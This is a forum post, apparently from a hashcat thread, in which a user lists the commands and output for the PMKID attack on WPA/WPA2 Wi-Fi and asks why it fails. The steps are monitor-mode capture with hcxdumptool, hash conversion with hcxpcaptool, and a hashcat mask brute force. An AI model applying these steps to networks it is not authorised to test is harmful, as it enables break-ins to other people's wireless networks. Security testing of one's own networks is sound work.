New attack on WPA/WPA2 using PMKID
Am I doing this right?

Step 0: Device is in monitor mode:


Code:
$ iw dev
    phy#0
        Interface mon0
            ifindex 9
            wdev 0x3
            addr my:v6:ip:addr
            type monitor
            txpower 0.00 dBm
    Interface wlp9s0
        ifindex 3
        wdev 0x1
        addr my:v6:ip:addr
        ssid MyWifiStation
        type managed
        channel 1 (2412 MHz), width: 20 MHz, center1: 2412 MHz
        txpower 22.00 dBm


Step 1: hcxdumptool:


Code:
$ hcxdumptool -o test.pcapng -i mon0 --enable_status=1

    start capturing (stop with ctrl+c)
    INTERFACE:...............: mon0
    FILTERLIST...............: 0 entries
    MAC CLIENT...............: l390234ko230 (client)
    MAC ACCESS POINT.........: 460i32102l15 (start NIC)
    EAPOL TIMEOUT............: 150000
    REPLAYCOUNT..............: 63861
    ANONCE...................: 3d95f1cfaa3c68be23f65966754ab537462e132abee5ec55f3882

    INFO: cha=5, rx=1479, rx(dropped)=2, tx=4, powned=0, err=15


This doesn't seem to work no matter how long it runs. But this does:


Code:
$ nmcli d connect wlp9s0
$ sudo hcxdumptool -o test.pcapng -i wlp9s0 --enable_status=1

    start capturing (stop with ctrl+c)
    INTERFACE:...............: wlp2s0
    FILTERLIST...............: 0 entries
    MAC CLIENT...............: l390234ko230 (client)
    MAC ACCESS POINT.........: 460i32102l15 (start NIC)
    EAPOL TIMEOUT............: 150000
    REPLAYCOUNT..............: 65136
    ANONCE...................: dm102893jdy7192o0cmnf9938dc6a1dl10278ejcy16d6dk2028dkl1d

    [16:06:07 - 001] e3kd09njf739 -> fcc233f999e3 [FOUND PMKID CLIENT-LESS]
    [16:06:07 - 001] e3kd09njf739 -> 74c63be0c659 [FOUND PMKID]
    [16:06:07 - 001] a0e4cb92b48f -> wew3dcdew329 [FOUND PMKID CLIENT-LESS]
    [16:06:07 - 001] 74c63be0c659 -> e3kd09njf739 [FOUND HANDSHAKE AP-LESS, EAPOL TIMEOUT 8539]
    [16:06:08 - 001] e4186bb35776 -> d07714a05d13 [FOUND PMKID]


That only works if you run nmcli d connect wlp9s0 right before running hcxdumptool. But as you can see it does find a PMKID. It generates three test.pcapng files (test.pcapng, test.pcapng-0, test.pcapng-1). I've tried using all three files without any success.

Step 3: hcxpcaptool -z test.16800 test.pcapng

Code:
    192mf83df23fae35dj6cfa19dj72903j*20fkehi8ejfe*fmj3289urfe3*fjo3i13893u21jfi3723
    1kf923j7fmad75eekd961denfy1823hj*fk038dj8ye9w*fj02po3jijid*fo2309ifjewo8ewyuroe
    2j29d731j35862dfde923kj399d63bdr*ak0dk28eej09*e03j9j9df2e2*o390jfro2309d34243fj


Step 4: hashcat -m 16800 test.16800 -a 3 -w 3 '?l?l?l?l?l?lt!'


Code:
    Approaching final keyspace - workload adjusted.  

    Session..........: hashcat                       
    Status...........: Exhausted
    Hash.Type........: WPA-PMKID-PBKDF2
    Hash.Target......: test.16800
    Time.Started.....: Wed Sep 24 14:12:30 2018 (25 hours, 8 mins)
    Time.Estimated...: Thu Sep 25 15:20:07 2018 (0 secs)
    Guess.Mask.......: ?l?l?l?l?l?lt! [8]
    Guess.Queue......: 1/1 (100.00%)
    Speed.#1.........:    14467 H/s (24.94ms) @ Accel:1024 Loops:512 Thr:1 Vec:8
    Recovered........: 0/3 (0.00%) Digests, 0/2 (0.00%) Salts
    Progress.........: 617831552/617831552 (100.00%)
    Rejected.........: 0/617831552 (0.00%)
    Restore.Point....: 11881376/11881376 (100.00%)
    Restore.Sub.#1...: Salt:1 Amplifier:25-26 Iteration:0-1
    Candidates.#1....: xpgjqxt! -> xqxvqxt!

    Started: Mon Sep 24 14:12:30 2018
    Stopped: Tue Sep 25 15:18:07 2018


It's going wrong somewhere but I can't tell where.


Messages In This Thread
New attack on WPA/WPA2 using PMKID - by atom - 08-04-2018, 06:50 PM
RE: New attack on WPA/WPA using PMKID - by hash93 - 08-04-2018, 09:18 PM
RE: New attack on WPA/WPA using PMKID - by ZerBea - 08-05-2018, 10:53 AM
RE: New attack on WPA/WPA2 using PMKID - by kcdtv - 08-05-2018, 11:41 PM
RE: New attack on WPA/WPA2 using PMKID - by lint - 08-06-2018, 06:09 PM
RE: New attack on WPA/WPA2 using PMKID - by lint - 11-07-2018, 07:05 PM
RE: New attack on WPA/WPA2 using PMKID - by atom - 08-08-2018, 11:16 AM
RE: New attack on WPA/WPA2 using PMKID - by atom - 08-08-2018, 11:55 AM
RE: New attack on WPA/WPA2 using PMKID - by kcdtv - 08-09-2018, 04:11 PM
RE: New attack on WPA/WPA2 using PMKID - by octf - 08-11-2018, 07:21 AM
RE: New attack on WPA/WPA2 using PMKID - by skan - 08-13-2018, 03:57 AM
RE: New attack on WPA/WPA2 using PMKID - by LoZio - 08-17-2018, 01:49 PM
RE: New attack on WPA/WPA2 using PMKID - by L3pus - 08-21-2018, 09:23 AM
RE: New attack on WPA/WPA2 using PMKID - by lint - 09-03-2018, 12:07 PM
RE: New attack on WPA/WPA2 using PMKID - by sao - 08-27-2018, 06:10 AM
RE: New attack on WPA/WPA2 using PMKID - by Mem5 - 08-27-2018, 07:24 PM
RE: New attack on WPA/WPA2 using PMKID - by JCas - 09-01-2018, 02:13 PM
RE: New attack on WPA/WPA2 using PMKID - by dafez - 09-03-2018, 04:40 PM
RE: New attack on WPA/WPA2 using PMKID - by dafez - 09-07-2018, 04:55 AM
RE: New attack on WPA/WPA2 using PMKID - by marcou3000 - 09-21-2018, 03:43 AM
RE: New attack on WPA/WPA2 using PMKID - by Mem5 - 09-21-2018, 09:39 AM
RE: New attack on WPA/WPA2 using PMKID - by marcou3000 - 09-21-2018, 12:51 PM
RE: New attack on WPA/WPA2 using PMKID - by marcou3000 - 09-22-2018, 01:49 AM
RE: New attack on WPA/WPA2 using PMKID - by marcou3000 - 09-22-2018, 04:50 PM
RE: New attack on WPA/WPA2 using PMKID - by marcou3000 - 09-22-2018, 10:22 PM
RE: New attack on WPA/WPA2 using PMKID - by cashhat - 09-26-2018, 09:50 PM
RE: New attack on WPA/WPA2 using PMKID - by Rit - 10-23-2018, 11:07 PM
RE: New attack on WPA/WPA2 using PMKID - by Rit - 10-27-2018, 06:29 PM
RE: New attack on WPA/WPA2 using PMKID - by Rit - 10-27-2018, 06:20 PM
RE: New attack on WPA/WPA2 using PMKID - by Rit - 10-27-2018, 06:31 PM
RE: New attack on WPA/WPA2 using PMKID - by lint - 11-07-2018, 07:10 PM